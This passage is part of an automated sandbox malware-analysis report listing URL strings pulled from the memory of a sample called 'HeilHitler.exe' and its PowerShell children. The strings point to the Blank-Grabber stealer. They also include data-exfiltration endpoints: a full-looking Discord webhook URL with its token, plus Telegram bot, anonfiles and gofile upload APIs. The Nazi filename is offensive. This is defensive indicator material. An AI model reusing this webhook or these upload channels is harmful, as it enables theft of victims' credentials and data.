              Source: HeilHitler.exe, rar.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 00000007.00000002.1838904578.0000026DC92AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0
              Source: powershell.exe, 00000026.00000002.1830812751.000002871CD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000026.00000002.1830812751.000002871D000000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871CD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: HeilHitler.exe, 00000000.00000003.1678668051.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678458745.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678252343.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1681133155.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679683243.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1680725372.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678076504.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679884394.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678337779.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678569630.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1680619720.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1677368472.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679315296.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1677584002.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678764252.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.dr, _hashlib.pyd.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: HeilHitler.exe, 00000001.00000002.2026948270.000001BD43481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: powershell.exe, 00000026.00000002.1824448366.00000287197FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: HeilHitler.exe, 00000001.00000003.2021328315.000001BD43658000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2030548396.000001BD4365F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2021194278.000001BD43652000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2021471863.000001BD4365E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftOWNLO~1.TXTy.
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CC4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: HeilHitler.exe, 00000001.00000002.2032925274.000001BD44538000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1761523281.000001BD4377A000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763010385.000001BD4377B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 00000007.00000002.1766127413.0000026DB0C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871B6F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot%s/%s
              Source: HeilHitler.exe, 00000001.00000002.2032762896.000001BD43DE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 00000026.00000002.1887725142.000002872B769000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000026.00000002.1887725142.000002872B769000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000026.00000002.1887725142.000002872B769000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: HeilHitler.exe, rar.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
              Source: HeilHitler.exe, rar.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
              Source: HeilHitler.exe, rar.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: HeilHitler.exe, 00000001.00000002.2031419097.000001BD43930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1302413781162266715/WJ0cdpWb68IO94MZWMtc7o2HkgZFWYLoExtrMC3fyimxUgR
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42BF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
              Source: HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
              Source: HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42BF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
              Source: HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
              Source: HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
              Source: HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
              Source: HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42BF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
              Source: HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
              Source: HeilHitler.exe, 00000001.00000002.2022344283.000001BD40F50000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
              Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: HeilHitler.exe, 00000001.00000002.2031419097.000001BD43930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
              Source: HeilHitler.exe, 00000001.00000003.1689251568.000001BD43570000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1689605920.000001BD43351000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1689683339.000001BD43570000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1689516521.000001BD43569000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1689067447.000001BD4393E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
              Source: powershell.exe, 00000026.00000002.1830812751.000002871D000000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871CD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: HeilHitler.exe, 00000001.00000002.2022344283.000001BD40F50000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
              Source: HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
              Source: HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
              Source: HeilHitler.exe, 00000001.00000002.2022344283.000001BD40F50000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
              Source: HeilHitler.exe, 00000001.00000002.2022344283.000001BD40F50000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
              Source: HeilHitler.exe, 00000001.00000002.2031419097.000001BD43930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
              Source: HeilHitler.exe, 00000001.00000003.1907543224.000001BD434A1000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750384495.000001BD434A6000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1753590052.000001BD434A4000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD434A7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2027310965.000001BD434A7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763679896.000001BD434A7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1737287565.000001BD434A7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018427043.000001BD434A4000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2026948270.000001BD43330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
              Source: HeilHitler.exe, 00000001.00000002.2031557342.000001BD43A30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
              Source: powershell.exe, 00000026.00000002.1830812751.000002871C5C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: HeilHitler.exe, 00000001.00000002.2024405519.000001BD43090000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1752805888.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2027310965.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1723921949.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763679896.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018427043.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750384495.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717535771.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1732575141.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1748948213.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
              Source: HeilHitler.exe, 00000001.00000002.2022344283.000001BD40F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: HeilHitler.exe, 00000001.00000002.2024405519.000001BD43090000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1752805888.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717535771.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1732575141.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1748948213.000001BD43091000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: HeilHitler.exe, 00000001.00000003.2021033088.000001BD43107000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2026948270.000001BD43330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43D28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: HeilHitler.exe, 00000001.00000002.2032925274.000001BD44544000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CC4000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1761523281.000001BD4377A000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763010385.000001BD4377B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
              Source: powershell.exe, 00000007.00000002.1824453418.0000026DC0C84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1887725142.000002872B8AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871D05B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1887725142.000002872B769000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000026.00000002.1830812751.000002871CD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000026.00000002.1830812751.000002871CD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: HeilHitler.exe, 00000001.00000002.2036487623.00007FFDFB784000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://python.org/dev/peps/pep-0263/
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: HeilHitler.exe, rar.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
              Source: HeilHitler.exe, 00000001.00000003.1751574081.000001BD4378F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1742219198.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1739607495.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1733099301.000001BD4378F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1749581142.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1754056720.000001BD436E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: HeilHitler.exe, 00000001.00000003.1723565686.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1741897379.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1730926379.000001BD4367B000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43737000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718513847.000001BD436DA000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1724146953.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1751574081.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1720857356.000001BD43737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: HeilHitler.exe, 00000001.00000003.1723565686.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43737000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718513847.000001BD436DA000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1720857356.000001BD43737000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2026948270.000001BD43330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: HeilHitler.exe, 00000001.00000003.1741897379.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1751574081.000001BD4379F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
              Source: HeilHitler.exe, 00000001.00000003.1907543224.000001BD434D3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2024405519.000001BD43090000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434A1000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907001507.000001BD43734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: HeilHitler.exe, 00000001.00000003.1907001507.000001BD43734000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907174052.000001BD43738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: HeilHitler.exe, 00000001.00000003.1907543224.000001BD434D3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2024405519.000001BD43090000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434A1000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907001507.000001BD43734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: HeilHitler.exe, 00000001.00000003.1907001507.000001BD43734000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907174052.000001BD43738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: HeilHitler.exe, 00000001.00000002.2024405519.000001BD43030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: HeilHitler.exe, 00000001.00000002.2027310965.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2024405519.000001BD43030000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1723921949.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763679896.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018427043.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750384495.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: HeilHitler.exe, 00000001.00000002.2031557342.000001BD43A30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: HeilHitler.exe, 00000001.00000002.2031684377.000001BD43B30000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031419097.000001BD43930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: HeilHitler.exe, 00000001.00000002.2031419097.000001BD43930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsC
              Source: HeilHitler.exe, 00000001.00000003.1907250502.000001BD43701000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CC4000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2019563496.000001BD43701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C7C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
              Source: HeilHitler.exe, 00000000.00000003.1679598819.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679598819.0000028B9208C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
